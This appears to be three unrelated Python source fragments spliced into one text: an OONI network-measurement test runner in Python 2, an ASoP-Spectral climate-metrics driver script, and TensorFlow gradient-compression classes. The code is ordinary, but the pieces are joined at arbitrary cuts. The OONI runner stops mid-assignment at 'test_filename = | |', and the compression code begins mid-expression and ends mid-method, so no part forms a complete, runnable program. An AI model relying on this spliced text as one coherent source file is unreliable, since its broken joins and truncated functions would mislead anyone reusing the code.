import sys
import time
import inspect
import traceback
import itertools
import random
import yaml
from twisted.python import reflect, usage
from twisted.internet import defer
from twisted.trial.runner import filenameToModule
from twisted.internet import reactor, threads
from txtorcon import TorProtocolFactory, TorConfig
from txtorcon import TorState, launch_tor
from ooni import config
from ooni.reporter import OONIBReporter, YAMLReporter, OONIBReportError
from ooni.inputunit import InputUnitFactory
from ooni.nettest import NetTestCase, NoPostProcessor
from ooni.utils import log, checkForRoot, pushFilenameStack
from ooni.utils import NotRootError, Storage
from ooni.utils.net import randomFreePort
def processTest(obj, cmd_line_options):
"""
Process the parameters and :class:`twisted.python.usage.Options` of a
:class:`ooni.nettest.Nettest`.
:param obj:
An uninstantiated old test, which should be a subclass of
:class:`ooni.plugoo.tests.OONITest`.
:param cmd_line_options:
A configured and instantiated :class:`twisted.python.usage.Options`
class.
"""
if not hasattr(obj.usageOptions, 'optParameters'):
obj.usageOptions.optParameters = []
if obj.inputFile:
obj.usageOptions.optParameters.append(obj.inputFile)
if obj.baseParameters:
for parameter in obj.baseParameters:
obj.usageOptions.optParameters.append(parameter)
if obj.baseFlags:
if not hasattr(obj.usageOptions, 'optFlags'):
obj.usageOptions.optFlags = []
for flag in obj.baseFlags:
obj.usageOptions.optFlags.append(flag)
options = obj.usageOptions()
options.parseOptions(cmd_line_options['subargs'])
obj.localOptions = options
if obj.inputFile:
obj.inputFilename = options[obj.inputFile[0]]
try:
log.debug("processing options")
tmp_test_case_object = obj()
tmp_test_case_object._checkRequiredOptions()
except usage.UsageError, e:
test_name = tmp_test_case_object.name
log.err("There was an error in running %s!" % test_name)
log.err("%s" % e)
options.opt_help()
raise usage.UsageError("Error in parsing command line args for %s" % test_name)
if obj.requiresRoot:
try:
checkForRoot()
except NotRootError:
log.err("%s requires root to run" % obj.name)
sys.exit(1)
return obj
def isTestCase(obj):
try:
return issubclass(obj, NetTestCase)
except TypeError:
return False
def findTestClassesFromFile(cmd_line_options):
"""
Takes as input the command line config parameters and returns the test
case classes.
:param filename:
the absolute path to the file containing the ooniprobe test classes
:return:
A list of class objects found in a file or module given on the
commandline.
"""
filename = cmd_line_options['test']
classes = []
module = filenameToModule(filename)
for name, val in inspect.getmembers(module):
if isTestCase(val):
classes.append(processTest(val, cmd_line_options))
return classes
def makeTestCases(klass, tests, method_prefix):
"""
Takes a class some tests and returns the test cases. method_prefix is how
the test case functions should be prefixed with.
"""
cases = []
for test in tests:
cases.append((klass, method_prefix+test))
return cases
class NoTestCasesFound(Exception):
pass
def loadTestsAndOptions(classes, cmd_line_options):
"""
Takes a list of test classes and returns their testcases and options.
"""
method_prefix = 'test'
options = None
test_cases = []
for klass in classes:
tests = reflect.prefixedMethodNames(klass, method_prefix)
if tests:
test_cases = makeTestCases(klass, tests, method_prefix)
test_klass = klass()
options = test_klass._processOptions()
if not test_cases:
raise NoTestCasesFound
return test_cases, options
def runTestCasesWithInput(test_cases, test_input, yaml_reporter,
oonib_reporter=None):
"""
Runs in parallel all the test methods that are inside of the specified test case.
Reporting happens every time a Test Method has concluded running.
Once all the test methods have been called we check to see if the
postProcessing class method returns something. If it does return something
we will write this as another entry inside of the report called post_processing.
Args:
test_cases (list): A list of tuples containing the test_class (a
class) and the test_method (a string)
test_input (instance): Any instance that will be passed as input to
the test.
yaml_reporter: An instance of :class:ooni.reporter.YAMLReporter
oonib_reporter: An instance of :class:ooni.reporter.OONIBReporter. If
this is set to none then we will only report to the YAML reporter.
"""
# This is used to store a copy of all the test reports
tests_report = {}
def write_report(test_instance, test_name):
if not oonib_reporter:
return yaml_reporter.testDone(test_instance, test_name)
d1 = oonib_reporter.testDone(test_instance, test_name)
d2 = yaml_reporter.testDone(test_instance, test_name)
dl = defer.DeferredList([d1, d2])
@dl.addErrback
def reportingFailed(failure):
log.err("Error in reporting %s" % test_name)
log.exception(failure)
return dl
def test_done(result, test_instance, test_name):
log.msg("Finished running %s" % test_name)
log.debug("Deferred callback result: %s" % result)
tests_report[test_name] = dict(test_instance.report)
return write_report(test_instance, test_name)
def test_error(failure, test_instance, test_name):
log.err("Error in running %s" % test_name)
log.exception(failure)
return write_report(test_instance, test_name)
def tests_done(result, test_class):
test_instance = test_class()
test_instance.report = {}
test_instance.input = None
test_instance._start_time = time.time()
post = getattr(test_instance, 'postProcessor')
try:
post_processing = post(tests_report)
if not oonib_reporter:
return yaml_reporter.testDone(test_instance, 'summary')
d1 = oonib_reporter.testDone(test_instance, 'summary')
d2 = yaml_reporter.testDone(test_instance, 'summary')
return defer.DeferredList([d1, d2])
except NoPostProcessor:
log.debug("No post processor configured")
return
dl = []
for test_case in test_cases:
log.debug("Processing %s" % test_case[1])
test_class = test_case[0]
test_method = test_case[1]
log.debug("Running %s with %s..." % (test_method, test_input))
test_instance = test_class()
test_instance.input = test_input
test_instance.report = {}
# use this to keep track of the test runtime
test_instance._start_time = time.time()
# call setups on the test
test_instance._setUp()
test_instance.setUp()
test = getattr(test_instance, test_method)
d = defer.maybeDeferred(test)
d.addCallback(test_done, test_instance, test_method)
d.addErrback(test_error, test_instance, test_method)
dl.append(d)
test_methods_d = defer.DeferredList(dl)
test_methods_d.addCallback(tests_done, test_cases[0][0])
@test_methods_d.addErrback
def deferredListFailed(failure):
log.err("Error Test Method Deferred List")
log.exception(failure)
return test_methods_d
def runTestCasesWithInputUnit(test_cases, input_unit, yaml_reporter,
oonib_reporter):
"""
Runs the Test Cases that are given as input parallely.
A Test Case is a subclass of ooni.nettest.NetTestCase and a list of
methods.
The deferred list will fire once all the test methods have been
run once per item in the input unit.
test_cases: A list of tuples containing the test class and the test method as a string.
input_unit: A generator that yields an input per iteration
"""
log.debug("Running test cases with input unit")
dl = []
for test_input in input_unit:
log.debug("Running test with this input %s" % test_input)
d = runTestCasesWithInput(test_cases,
test_input, yaml_reporter, oonib_reporter)
dl.append(d)
return defer.DeferredList(dl)
class InvalidResumeFile(Exception):
pass
class noResumeSession(Exception):
pass
def loadResumeFile():
"""
Sets the singleton stateDict object to the content of the resume file.
If the file is empty then it will create an empty one.
Raises:
:class:ooni.runner.InvalidResumeFile if the resume file is not valid
"""
if not config.stateDict:
try:
with open(config.resume_filename) as f:
config.stateDict = yaml.safe_load(f)
except:
log.err("Error loading YAML file")
raise InvalidResumeFile
if not config.stateDict:
with open(config.resume_filename, 'w+') as f:
yaml.safe_dump(dict(), f)
config.stateDict = dict()
elif isinstance(config.stateDict, dict):
return
else:
log.err("The resume file is of the wrong format")
raise InvalidResumeFile
def resumeTest(test_filename, input_unit_factory):
"""
Returns the an input_unit_factory that is at the index of the previous run of the test
for the specified test_filename.
Args:
test_filename (str): the filename of the test that is being run
including the .py extension.
input_unit_factory (:class:ooni.inputunit.InputUnitFactory): with the
same input of the past run.
Returns:
:class:ooni.inputunit.InputUnitFactory that is at the index of the
previous test run.
"""
try:
idx = config.stateDict[test_filename]
for x in range(idx):
try:
input_unit_factory.next()
except StopIteration:
log.msg("Previous run was complete")
return input_unit_factory
return input_unit_factory
except KeyError:
log.debug("No resume key found for selected test name. It is therefore 0")
config.stateDict[test_filename] = 0
return input_unit_factory
@defer.inlineCallbacks
def updateResumeFile(test_filename):
"""
update the resume file with the current stateDict state.
"""
log.debug("Acquiring lock for %s" % test_filename)
yield config.resume_lock.acquire()
current_resume_state = yaml.safe_load(open(config.resume_filename))
current_resume_state = config.stateDict
yaml.safe_dump(current_resume_state, open(config.resume_filename, 'w+'))
log.debug("Releasing lock for %s" % test_filename)
config.resume_lock.release()
defer.returnValue(config.stateDict[test_filename])
@defer.inlineCallbacks
def increaseInputUnitIdx(test_filename):
"""
Args:
test_filename (str): the filename of the test that is being run
including the .py extension.
input_unit_idx (int): the current input unit index for the test.
"""
config.stateDict[test_filename] += 1
yield updateResumeFile(test_filename)
def updateProgressMeters(test_filename, input_unit_factory,
test_case_number):
"""
Update the progress meters for keeping track of test state.
"""
if not config.state.test_filename:
config.state[test_filename] = Storage()
config.state[test_filename].per_item_average = 2.0
input_unit_idx = float(config.stateDict[test_filename])
input_unit_items = len(input_unit_factory)
test_case_number = float(test_case_number)
total_iterations = input_unit_items * test_case_number
current_iteration = input_unit_idx * test_case_number
log.debug("input_unit_items: %s" % input_unit_items)
log.debug("test_case_number: %s" % test_case_number)
log.debug("Test case number: %s" % test_case_number)
log.debug("Total iterations: %s" % total_iterations)
log.debug("Current iteration: %s" % current_iteration)
def progress():
return (current_iteration / total_iterations) * 100.0
config.state[test_filename].progress = progress
def eta():
return (total_iterations - current_iteration) \
* config.state[test_filename].per_item_average
config.state[test_filename].eta = eta
config.state[test_filename].input_unit_idx = input_unit_idx
config.state[test_filename].input_unit_items = input_unit_items
@defer.inlineCallbacks
def runTestCases(test_cases, options, cmd_line_options):
log.debug("Running %s" % test_cases)
log.debug("Options %s" % options)
log.debug("cmd_line_options %s" % dict(cmd_line_options))
test_inputs = options['inputs']
# Set a default reporter
if not cmd_line_options['collector'] and not \
cmd_line_options['no-default-reporter']:
with open('collector') as f:
reporter_url = random.choice(f.readlines())
reporter_url = reporter_url.split('#')[0].strip()
cmd_line_options['collector'] = reporter_url
oonib_reporter = OONIBReporter(cmd_line_options)
yaml_reporter = YAMLReporter(cmd_line_options)
if cmd_line_options['collector']:
log.msg("Using remote collector, please be patient while we create the report.")
try:
yield oonib_reporter.createReport(options)
except OONIBReportError:
log.err("Error in creating new report")
log.msg("We will only create reports to a file")
oonib_reporter = None
else:
oonib_reporter = None
yield yaml_reporter.createReport(options)
log.msg("Reporting to file %s" % yaml_reporter._stream.name)
try:
input_unit_factory = InputUnitFactory(test_inputs)
input_unit_factory.inputUnitSize = int(cmd_line_options['parallelism'])
except Exception, e:
log.exception(e)
try:
loadResumeFile()
except InvalidResumeFile:
log.err("Error in loading resume file %s" % config.resume_filename)
log.err("Try deleting the resume file")
raise InvalidResumeFile
test_filename = | |
<reponame>nick-klingaman/ASoP
# Copyright 2021 Lawrence Livermore National Security, LLC
"""
This script is used by cmec-driver to run the ASoP-Spectral metrics.
It is based on the workflow in ASoP1_spectral_main.py and
can be called with the aruments listed below. Keys that can be set
in the config or settings dictionary are: region, timescale-all, mask,
dates-all, and season-all.
Arguments:
* model_dir:
directory containing model data
* obs_dir:
directory containing obs data
* wk_dir:
output directory
* config_path:
JSON config file (optional)
* settings:
dictionary of settings (optional)
Author: <NAME>
"""
import argparse
from datetime import datetime, timezone
import glob
import itertools
import json
import os
from platform import python_version
import iris
import make_hist_maps
import plot_hist_maps
import plot_hist1d
from ASoP_Spectral_metric import plot_metric
from set_descriptive_text import set_descriptive_text
# set date once for provenance
current_date = datetime.now(timezone.utc).strftime("%b %d %Y %H:%M:%S")+" UTC"
# setting output directory names
figure_dir_name = "asop_figures"
metrics_dir_name = "asop_metrics"
def main(model_dir, obs_dir, wk_dir, config_path=None, settings=None):
"""
Read in data and create histogram cubes, save these to netcdf files.
Then plot histogram maps and some regional 1d histograms
Arguments:
* model_dir
Directory containing model precipitation time series and/or
pre-calculated histogram cubes
* obs_dir
Directory containing observational precipitation time series
and/or pre-calculated histogram cubes.
* wk_dir
Path to output directory
* config_path (optional)
Path to configuration JSON (for CMEC driver)
* settings (optional)
Dictionary containing choices for region and timescale
"""
# Load CMEC config
if config_path is not None:
print("Loading configuration file")
with open (config_path,"r") as fname:
settings=json.load(fname)["ASoP/Spectral"]
print("Settings from configuration file:\n",json.dumps(settings, indent=4))
elif settings is None:
settings={
"regions": {"default":[-10.0, 10.0, 60.0, 160.0]},
"figure_type": "png",
"timescale-all": "",
"mask": None,
"dates-all": "",
"season-all": ""}
print("Using default settings")
# Re-order the regions from Coherence to Spectral format
for r in settings["regions"]:
settings["regions"][r][:]=[settings["regions"][r][i] for i in [2,0,3,1]]
# Clean up extension in case there is a leading '.'
ext = '.'+settings.get('figure_type','png').replace(".","")
# Set up output files and directories
json_filename=os.path.join(wk_dir,"output.json")
initialize_descriptive_json(json_filename,wk_dir,model_dir,obs_dir)
os.mkdir(os.path.join(wk_dir,figure_dir_name))
os.mkdir(os.path.join(wk_dir,metrics_dir_name))
# Get input file lists and separate histogram cubes from timeseries
hist_input_model,model_filenames=get_filename_lists(model_dir)
hist_input_obs,obs_filenames=get_filename_lists(obs_dir)
# Make and save histogram cubes if they don't already exist
# for the timeseries files
make_hist_model,new_hist_model=check_histogram_files(model_filenames)
new_hist_model=[os.path.join(wk_dir,f) for f in new_hist_model]
make_hist_obs,new_hist_obs=check_histogram_files(obs_filenames)
new_hist_obs=[os.path.join(wk_dir,f) for f in new_hist_obs]
for hlist in [make_hist_model,make_hist_obs]:
if hlist:
print("Making histograms")
making_histogram_files(hlist,wk_dir)
# Combine input and newly made histogram files into one list
hist_filenames_model=sorted(hist_input_model+new_hist_model)
hist_filenames_obs=(hist_input_obs+new_hist_obs)
if len(hist_filenames_obs) > 1:
raise RuntimeError("More than one benchmark dataset found.")
elif len(hist_filenames_obs) == 0:
raise RuntimeError("No control datasets provided")
# Want obs to go first in list for diffs
hist_filenames=hist_filenames_obs+hist_filenames_model
runtitles_long=make_runtitle(hist_filenames,settings)
runtitles_short=make_runtitle(hist_filenames,settings,model_only=True)
region_dict=settings.get("regions",{"default":[60.0,-10.0,160.0,10.0]})
for region in region_dict:
# Plot histogram maps
print("Plotting histogram maps")
myregion=region_dict[region]
for item in hist_filenames_model:
title1=runtitles_long[item]
title2=runtitles_long[hist_filenames_obs[0]]
plotname_root=figure_dir_name+'/compare_{0}_{1}_{2}'.format(title1,title2,region)
filenames=[item,hist_filenames_obs[0]]
plot_histogram_maps(filenames,plotname_root,wk_dir,myregion,ext,settings)
# 1d histogram plots
print("Plotting 1d histograms")
timescale=settings.get("timescale-all",None)
plottitle='All datasets'
plotname_root=figure_dir_name+'/compare_as_1dhistograms_{0}'.format(region)
# Plot 1d histograms of model data with obs overplotted
runtitles_model=[runtitles_short[f] for f in hist_filenames_model]
runtitles_obs=[runtitles_short[hist_filenames_obs[0]]]
plot_1d_histograms(
hist_filenames_model,runtitles_model, \
hist_filenames_obs,runtitles_obs, \
timescale,myregion,plottitle,plotname_root,wk_dir,ext)
# 1d histogram DIFFERENCE plots
print("Plotting 1d histogram differences")
title_long=runtitles_long[hist_filenames_obs[0]]
title_short=runtitles_short[hist_filenames_obs[0]]
titles=[[title_short,runtitles_short[f]] for f in hist_filenames_model]
filenames = [[hist_filenames_obs[0],f] for f in hist_filenames_model]
plottitle='Differences between datasets'
plotname_root=figure_dir_name+'/compare_as_1dhist_differences_{0}_{1}_{2}'.format(title_long,"all_models",region)
# Plot differences between 1d histograms from 1 model datasets
plot_1d_histogram_diffs(
filenames,titles,timescale, \
myregion,plottitle,plotname_root,wk_dir,ext)
# plot histogram metric
mask=settings.get("mask",None)
print("Mask: " + str(mask))
dates=settings.get("dates-all","")
season=settings.get("season-all","")
# Mask file must be present for this metric
if (mask is not None) and (timescale is not None):
if os.path.exists(mask):
print("Making histogram metrics")
json_filename=wk_dir+"/"+metrics_dir_name+"/histogram_metric.json"
model_combo=[[f,hist_filenames_obs[0]] for f in hist_filenames_model]
initialize_metrics_json(json_filename,hist_filenames_obs[0],hist_filenames_model,settings)
make_histogram_metrics(model_combo,season,timescale,dates,mask, \
wk_dir,json_filename,settings,ext)
else:
raise RuntimeError("Mask file not found.")
else:
for keyword,val in zip([mask,timescale],["mask","timescale-all"]):
if val is None:
raise RuntimeError("Keyword not found: {0}",keyword)
# output html page
write_index_html(wk_dir,region_dict,ext)
print('Processing completed OK!')
return
def check_histogram_files(filename_list):
"""
For the timeseries files in model_filenames, check if an
equivalent histogram file already exists.
Arguments:
* filename_list
List of precipitation timeseries files
"""
make_hist=[]
new_hist=[]
check_for_hist=[".".join(f.split(".")[:-1])+"_hist.nc" for f in filename_list]
for data,hist in zip(filename_list,check_for_hist):
if not os.path.exists(hist):
make_hist.append(data)
new_hist.append(os.path.basename(hist))
return make_hist, new_hist
def making_histogram_files(filename_list,wk_dir):
"""
Read in data and create histogram cubes, save these to netcdf files.
Arguments:
* filename_list
List of precipitation timeseries files
* wk_dir
Path to output directory
"""
desc = {}
for fname in filename_list:
print("Loading cube for",fname)
fname_tmp = os.path.basename(fname)
hname = os.path.join(wk_dir,".".join(fname_tmp.split(".")[:-1])+"_hist.nc")
ppndata1=make_hist_maps.read_data_cube(fname)
ppn_hist_cube=make_hist_maps.make_hist_ppn(ppndata1)
iris.save(ppn_hist_cube, hname)
desc.update({os.path.relpath(hname,start=wk_dir): {
"long_name": "iris histogram cubes",
"description": "histograms saved individually for model and obs data"}})
update_json("data",desc,wk_dir+"/output.json")
return
def plot_histogram_maps(hist_filenames,plotname_root,wk_dir,region,ext,settings):
"""
Plot histogram maps
"""
hist_filename1=hist_filenames[0]
hist_filename2=hist_filenames[1]
ppn_hist_cube1=make_hist_maps.read_data_cube(hist_filename1)
ppn_hist_cube2=make_hist_maps.read_data_cube(hist_filename2)
avg_rain_bins_a,avg_rain_bins_frac_a=make_hist_maps.calc_rain_contr(ppn_hist_cube1)
avg_rain_bins_b,avg_rain_bins_frac_b=make_hist_maps.calc_rain_contr(ppn_hist_cube2)
ppn_names=make_runtitle([hist_filename1,hist_filename2],settings)
ppn1_name=ppn_names[hist_filename1].replace("_"," ")
ppn2_name=ppn_names[hist_filename2].replace("_"," ")
names=make_runtitle([hist_filename1,hist_filename2],settings,model_only=True)
runtitle="{0} vs {1}".format(names[hist_filename1].replace("_"," "),names[hist_filename2].replace("_"," "))
# (optional) Define how you want to lump the bins together (below is the default)
all_ppn_bounds = [(0.005, 10.), (10., 50.), (50., 100.), (100., 3000.)]
# Plot as actual contributions for specific region, e.g. 60 to 160E,10S to 10N
desc={}
plotname='{0}_actual_contributions{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist_maps.plot_rain_contr(avg_rain_bins_a,avg_rain_bins_b,plotname,
runtitle,ppn1_name,ppn2_name,all_ppn_bounds,region=region)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual contribution of each timescale for region {0}".format(region)}})
# Plot as fractional contributions
plotname='{0}_fractional_contributions{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist_maps.plot_rain_contr(avg_rain_bins_frac_a,avg_rain_bins_frac_b,plotname,
runtitle,ppn1_name,ppn2_name,all_ppn_bounds,region=region,frac=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional contribution of each timescale for region {0}".format(region)}})
update_json("plots",desc, wk_dir+"/output.json")
return
def plot_1d_histograms(filenames,runtitles,filenames_obs,runtitles_obs,timescale,
myregion,plottitle,plotname_root,wk_dir,ext):
"""
Plot 1d histograms for a small region.
This example uses histogram cubes pre-calculated from two different model datasets
on the same timescale, and compares with those from two observational datasets.
NOTE that the region and the timescale will appear automatically in the plot title
"""
desc={}
plotname='{0}_actual{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale=timescale,
filenames_obs=filenames_obs,runtitles_obs=runtitles_obs,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual histogram"}})
plotname='{0}_fractional{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale=timescale,
filenames_obs=filenames_obs,runtitles_obs=runtitles_obs,frac=1,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional histogram"}})
update_json("plots",desc,wk_dir+"/output.json")
return
def plot_1d_histogram_diffs(filenames,runtitles,timescale,
myregion,plottitle,plotname_root,wk_dir,ext):
"""
Plot 1d histograms for a small region.
This example uses histogram cubes pre-calculated from two different model datasets
on the same timescale, and compares with those from two observational datasets.
NOTE that the region and the timescale will appear automatically in the plot title
"""
desc={}
plotname='{0}_actual{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Actual 1d histogram for region "+str(myregion)}})
plotname='{0}_fractional{1}'.format(plotname_root,ext)
plotname=os.path.join(wk_dir,plotname)
plot_hist1d.plot_1dhist(plotname,myregion,filenames,runtitles,plottitle,timescale,frac=1,log=1)
desc.update({os.path.relpath(plotname,start=wk_dir): {
"description": "Fractional 1d histogram for "+str(myregion)}})
update_json("plots",desc,wk_dir+"/output.json")
return
def make_histogram_metrics(hist_combo,season,timescale,dates,mask,wk_dir,json_filename,settings,ext):
"""Set up and run the histogram metrics and difference plot."""
for ppn1,ppn2 in hist_combo:
titles=make_runtitle([ppn1,ppn2],settings,model_only=True)
name1=titles[ppn1]
name2=titles[ppn2]
tmp_list = [x for x in [timescale,season,dates] if x != ""]
plotname=wk_dir+"_".join(["/"+figure_dir_name+"/histogram_metric",name1,name2]+tmp_list)+ext
index_list=plot_metric(ppn1,ppn2,name1,name2,season,timescale,dates,mask,plotname)
result_list=[index_list[x].data.item() for x in range(6)]
# Add metrics to file. Use full name as key.
json_title=make_runtitle([ppn1,ppn2],settings)[ppn1]
results={json_title: {
"histogram overlap": {
"global": result_list[0],
"land": result_list[1],
"sea": result_list[2],
"tropics": result_list[3],
"NH mid-lat": result_list[4],
"SH mid-lat": result_list[5]
}
}
}
update_json("RESULTS",results,json_filename)
# Write figure metadata
desc={os.path.relpath(plotname,start=wk_dir): {
"description": "histogram metric global plot"}}
update_json("plots",desc,wk_dir+"/output.json")
# Write metrics file metadata
desc={os.path.relpath(json_filename,start=wk_dir): {
"description": "Histogram overlap metrics"}}
update_json("metrics",desc,wk_dir+"/output.json")
return
def get_filename_lists(directory):
"""Return lists of files in the directory, separating histogram cubes
end with '_hist.nc' from timeseries files."""
hist_list=[]
tseries_list=[]
if (directory is not None) and (directory != 'None'):
file_list=sorted(glob.glob(directory+"/*"))
hist_list = [f for f in file_list if f.endswith("_hist.nc")]
tseries_list = [f for f in file_list if f not in set(hist_list)]
return hist_list, tseries_list
def get_cube_name(data_cube,default_name="no name"):
# Return data set name obtained by checking common name variables
cube_name=default_name
for key in ["source_id","short_name","name","source","model"]:
if key in data_cube.attributes:
cube_name=data_cube.attributes[key]
break
if "variant_label" in data_cube.attributes:
cube_name+=("_"+data_cube.attributes["variant_label"])
return cube_name
def make_runtitle(data_cube_names,settings,model_only=False,return_timescale=False):
"""
Return a list of names for each data cube for use in figure titles. Option to
return timescale dictionary for histogram map headings.
"""
cube_name={}
extra_params = ["timescale","dates","season"]
timescale = dict.fromkeys(data_cube_names,"")
for fname in data_cube_names:
fbasename=os.path.basename(fname)
tmp_fname="_".join(fbasename.split("_")[:-1])+".nc"
if "name" in settings.get(fbasename,{}):
cube_name[fname]=settings[fbasename]["name"].replace(" ","_")
elif "name" in settings.get(tmp_fname,{}):
cube_name[fname]=settings[tmp_fname]["name"].replace(" ","_")
else:
data_cube=iris.load_cube(fname)
cube_name[fname]=get_cube_name(data_cube).replace(" ","_")
# Get season, dates, timescale if available in settings
for item in extra_params:
tmp="unknown"
# First see if 'all' setting exists
if settings.get(item+"-all",False):
tmp=settings[item+"-all"]
# Check for setting under histogram or regular filename
elif item in settings.get(fbasename,{}):
tmp=settings[fbasename][item]
elif item in settings.get(tmp_fname,{}):
tmp=settings[tmp_fname][item]
if tmp!="unknown" and not model_only:
cube_name[fname]=cube_name[fname]+"_"+tmp
if return_timescale and item=="timescale":
timescale[fname]=tmp
if return_timescale:
return cube_name,timescale
return cube_name
def initialize_descriptive_json(json_filename,wk_dir,model_dir,obs_dir):
"""
Create metadata JSON file that describes package outputs.
"""
from platform import python_version
output = {"provenance":{},"index": "index.html","data":{},"metrics":{},"plots":{},"html":"index.html"}
log_path = wk_dir + "/asop_spectral.log.txt"
output["provenance"] = {
"environment": {'iris':iris.__version__,'python':python_version()},
"modeldata": model_dir,
"obsdata": obs_dir,
"log": log_path,
"date": current_date}
with open(json_filename,"w") as output_json:
json.dump(output,output_json, indent=2)
return
def initialize_metrics_json(json_filename,control,test,settings):
"""
Initalize histogram metrics json for writing metrics
from ASoP_Spectral_metric.py
"""
schema = {"name": "CMEC", "version": "v1", "package": "ASoP"}
dims = {
"json_structure": ["test dataset","metric","region"],
"dimensions": {
"test dataset": {},
"metric": {
"histogram overlap": | |
tf.concat([y_estimates_neg, y_estimates_pos], 0)
#
# Kneg = tf.size(negative_indices)
# mask = tf.tensor_scatter_nd_update(tf.ones([params['K']], dtype=tf.int32), negative_indices, -tf.ones(Kneg, dtype=tf.int32))
# y_estimates = y_estimates * tf.cast(mask, tf.float64)
# values = tf.cast(tf.reshape(y_estimates, [-1]), tf.float32)
# else:
# values = message
#
# decompressed_indices = tf.expand_dims(decompressed_indices, 1)
# tensor_decompressed = tf.scatter_nd(decompressed_indices, values, [params['N']])
# tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
#
# return tensor_decompressed
#
class Values_Approximation_Logit_Compressor(Compressor):
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
N = tensor_flatten.get_shape().as_list()[0]
params['N'] = int(N)
print("Tensor", tensor, "size:", params['N'])
# params["layers"].add_data(tensor, params['N'])
if Values_Approximation_Helper.is_convolutional(params['model_name'], params['N']):
# p0 = [[0.004, -0.01, -0.04]]
p0 = [[0.001, 0.1, 0.00001]]
num_of_coefficients = len(p0[0])
sorted_indices = tf.argsort(tensor_flatten, axis=0, direction='ASCENDING')
values_sorted = tf.gather(tensor_flatten, sorted_indices)
values_sorted = tf.reshape(values_sorted, [N, 1])
X = np.array(range(1, N + 1), np.float64).reshape([1, N])
X_train = Values_Approximation_Helper.GetInputMatrix(X, p0, N)
coefficients = Values_Approximation_Helper.LeastSquares(X_train, tf.cast(values_sorted, tf.float64))
##################### Logging #####################
filename = resource_loader.get_path_to_datafile('mpi_lib.cpython-36m-x86_64-linux-gnu.so')
library = load_library.load_op_library(filename)
logger = library.logger
logger = logger(tensor_flatten, coefficients, tf.train.get_or_create_global_step(),
bloom_logs_path=params['bloom_logs_path'],
gradient_id=params['gradient_id'],
verbosity_frequency=params['bloom_verbosity_frequency'],
verbosity=params['bloom_verbosity'],
rank=rank())
##################### / Logging #####################
compressed_indices = sorted_indices
with tf.control_dependencies([logger]):
coefficients = tf.reshape(coefficients, [-1])
compressed_indices = tf.cast(compressed_indices, tf.float64)
tensor_compressed = tf.concat([coefficients, compressed_indices], 0)
params['message_size'] = num_of_coefficients
params['X_train'] = X_train
else:
tensor_compressed = tensor
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
tensor_shape = ctx
if Values_Approximation_Helper.is_convolutional(params['model_name'], params['N']):
message, indices = tf.split(tensor_compressed, [params['message_size'], params['N']])
decompressed_indices = tf.cast(indices, tf.int32)
message = tf.expand_dims(message, 1)
y_estimates = tf.matmul(params['X_train'], message)
y_estimates = tf.reshape(y_estimates, [-1])
values = tf.reshape(y_estimates, [-1])
decompressed_indices = tf.expand_dims(decompressed_indices, 1)
tensor_decompressed = tf.scatter_nd(decompressed_indices, tf.cast(values, tf.float32), [params['N']])
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
else:
tensor_decompressed = tensor_compressed
return tensor_decompressed
##########################################################################################
class ThresholdCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
threshold_val = params["threshold_val"]
thr_mask = tf.math.greater_equal(tf.math.abs(tensor_flatten), threshold_val)
values = tf.boolean_mask(tensor_flatten, thr_mask)
indices = tf.reshape(tf.where(thr_mask), [-1])
ctx = tensor_shape
values = tf.bitcast(values, tf.int32)
indices = tf.cast(indices, dtype=tf.int32)
tensor_compressed = tf.concat([values, indices], 0)
params['tensors_size_are_same'] = False
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
values, indices = tf.split(tensor_compressed, 2)
values = tf.bitcast(values, tf.float32)
tensor_shape = ctx
tensor_size = tf.math.reduce_prod(tensor_shape)
zero_tensor = tf.Variable(tf.zeros([tensor_size], dtype=tf.float32), trainable=False)
op = zero_tensor.assign(tf.zeros([tensor_size], dtype=tf.float32))
with tf.control_dependencies([op]):
tensor_decompressed = tf.scatter_update(zero_tensor, indices, values)
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
class SignSGDCompressor(Compressor):
""""""
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
agged_tensor = tf.math.add_n(tensors)
agged_tensor = tf.cast(tf.math.greater_equal(agged_tensor, 0), dtype=tf.float32)
agged_tensor = agged_tensor * 2.0 - 1.0
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
tensor_compressed = tf.math.greater_equal(tensor_flatten, 0)
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(sign_encode, ctx, params):
"""Decoding the signs to float format """
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class EFSignSGDCompressor(Compressor):
""""""
residuals = {}
@classmethod
def memory_compensate(cls, tensor, params):
"""Update the tensor with the residuals."""
name = tensor.name
lr = params["learning_rate"]
cls.residuals[tensor.name] = tf.Variable(tf.zeros_like(tensor), trainable=False)
tensor = cls.residuals[name] + lr * tensor
return tensor
@classmethod
def memory_update(cls, tensor, tensor_compensate, tensor_compressed, ctx, params):
